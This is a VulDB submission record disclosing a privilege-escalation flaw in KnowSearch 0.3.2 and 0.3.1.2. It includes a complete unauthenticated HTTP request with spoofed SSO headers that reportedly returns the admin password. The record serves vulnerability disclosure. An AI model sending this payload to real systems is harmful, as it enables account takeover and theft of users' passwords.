| Title | Privilege escalation exists in KnowSearch, and anyone can get others' passwords. |
|---|
| Description | Privilege escalation exists in KnowSearch 0.3.2 and 0.3.1.2. It results in anyone being able to get others' passwords. Then I can be anyone and do anything.
The demo URL is http://x.x.x.x:8080/.
If the following payload is sent, you will get the password of admin. No cookie exists in the payload, so even an anonymous user can do this.
GET /api/es/admin/v3/security/user/1 HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://x.x.x.x:8080/es/cluster/logic
X-SSO-USER: test6
X-SSO-USER-ID: 3
X-LOGI-SECURITY-PROJECT-ID: 6
Connection: close
Content-Length: 2
The issue link is https://github.com/didi/KnowSearch/issues/86 |
|---|
| Source | ⚠️ https://github.com/didi/KnowSearch/issues/86 |
|---|
| User | gaogaostone (UID 53740) |
|---|
| Submission | 31/08/2023 05:19 AM (2 years ago) |
|---|
| Moderation | 15/09/2023 08:16 AM (15 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 239795 [didi KnowSearch 0.3.1.2/0.3.2 1 privilege escalation] |
|---|
| Points | 20 |
|---|